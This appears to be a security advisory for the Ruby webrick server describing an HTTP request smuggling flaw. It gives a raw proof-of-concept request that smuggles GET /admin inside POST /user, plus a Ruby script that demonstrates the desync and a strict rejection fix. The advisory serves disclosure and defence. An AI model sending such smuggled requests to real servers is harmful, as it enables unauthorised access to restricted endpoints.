webrick is an HTTP server toolkit that can be configured as an HTTPS server, a proxy server, and a virtual-host server.
Affected versions of this package are vulnerable to HTTP Request Smuggling. When httprequest.rb processes a request that carries both a Content-Length header and a Transfer-Encoding header, the two headers give conflicting descriptions of where the message body ends, and the request is processed instead of being rejected (RFC 7230 section 3.3.3 requires a server to treat such a message as ambiguous). An attacker can send a POST /user whose body contains a complete GET /admin request and trick the server into treating the embedded GET /admin as a second, legitimate request, exposing data that was not meant to be reachable.
Note: The package maintainers advise against using this package in production and note that it is no longer shipped as part of Ruby, although it was in the past.
Proof of concept. A blank line separates the headers from the body, and the zero-length chunk that ends the chunked body is followed by the smuggled request; the 50-byte Content-Length covers exactly that body, so a Content-Length reader sees one request while a chunked reader sees two:

POST /user HTTP/1.1
Host: 127.0.0.1:8000
Content-Length: 50
Transfer-Encoding: chunked

0

GET /admin HTTP/1.1
Host: 127.0.0.1:8000

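The following Ruby script is an added example, not WEBrick's own code, showing why the request above is dangerous and what the fix has to look like. It frames the advisory's proof-of-concept request (constructed inline) two ways: by Content-Length, as a peer that ignores Transfer-Encoding would, and by chunked encoding, after which the GET /admin is left on the connection as a second request. A strict mode rejects any request carrying both headers outright. The function names, the AmbiguousFraming error class and the minimal parser are assumptions made for illustration.

```ruby
require "stringio"

CRLF = "\r\n"

# Hypothetical error type for this example.
class AmbiguousFraming < StandardError; end

# Parse the request line and header block; returns [request_line, headers].
# Header names are lower-cased so lookups are case-insensitive.
def parse_head(io)
  request_line = io.gets(CRLF) or raise "missing request line"
  headers = {}
  while (line = io.gets(CRLF)) && line != CRLF
    name, value = line.chomp(CRLF).split(":", 2)
    raise "malformed header line: #{line.inspect}" unless value
    headers[name.strip.downcase] = value.strip
  end
  [request_line.chomp(CRLF), headers]
end

# Body as a Content-Length-only reader determines it.
def read_fixed_body(io, headers)
  io.read(Integer(headers.fetch("content-length"))) || ""
end

# Body as a Transfer-Encoding: chunked reader determines it: read chunks until
# the zero-size chunk, then skip any trailers up to the terminating empty line.
def read_chunked_body(io)
  body = +""
  loop do
    size_line = io.gets(CRLF) or raise "truncated chunk-size line"
    size = Integer(size_line.chomp(CRLF).split(";", 2).first.strip, 16)
    if size.zero?
      while (line = io.gets(CRLF)) && line != CRLF; end
      return body
    end
    body << (io.read(size) or raise "truncated chunk")
    io.read(2) # CRLF that ends the chunk data
  end
end

# Frame one request off the stream. Lenient mode mirrors the classic pattern
# (chunked wins when present, otherwise Content-Length) and returns whatever
# bytes remain on the connection, which a server would parse as the next request.
# Strict mode refuses a message carrying both headers (RFC 7230 section 3.3.3).
def frame_request(raw, strict:)
  io = StringIO.new(raw)
  request_line, headers = parse_head(io)
  te, cl = headers["transfer-encoding"], headers["content-length"]
  if strict && te && cl
    raise AmbiguousFraming, "request carries both Content-Length and Transfer-Encoding"
  end
  body = if te&.downcase == "chunked"
           read_chunked_body(io)
         elsif cl
           read_fixed_body(io, headers)
         else
           ""
         end
  { request: request_line, body: body, leftover: io.read }
end

# How a Content-Length-only peer (for example an intermediary that does not
# understand chunked encoding) would frame the same bytes.
def frame_by_content_length(raw)
  io = StringIO.new(raw)
  request_line, headers = parse_head(io)
  { request: request_line, body: read_fixed_body(io, headers), leftover: io.read }
end

# Constructed sample: the advisory's proof-of-concept request. The 50-byte body is
# a zero-length chunk followed by a complete GET /admin request.
SMUGGLED_TAIL = "GET /admin HTTP/1.1#{CRLF}Host: 127.0.0.1:8000#{CRLF}#{CRLF}"
POC_BODY = "0#{CRLF}#{CRLF}#{SMUGGLED_TAIL}"
POC_REQUEST = "POST /user HTTP/1.1#{CRLF}" \
              "Host: 127.0.0.1:8000#{CRLF}" \
              "Content-Length: #{POC_BODY.bytesize}#{CRLF}" \
              "Transfer-Encoding: chunked#{CRLF}#{CRLF}" + POC_BODY

if $PROGRAM_NAME == __FILE__
  front = frame_by_content_length(POC_REQUEST)
  back  = frame_request(POC_REQUEST, strict: false)
  puts "Content-Length peer: one request, #{front[:leftover].bytesize} bytes left over"
  puts "chunked peer: next request line would be #{back[:leftover].lines.first.inspect}"
  begin
    frame_request(POC_REQUEST, strict: true)
  rescue AmbiguousFraming => e
    puts "strict framing rejected it: #{e.message}"
  end
end
```

Run it with `ruby smuggle_demo.rb`. The lenient framing shows the desync directly: the chunked reader consumes only the zero-length chunk and leaves `GET /admin HTTP/1.1` on the stream, while the Content-Length reader consumes all 50 bytes as the body of POST /user. The strict check is the only safe resolution, because picking either header is a guess the peer may make differently.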
Upgrade webrick to version 1.8.2 or higher.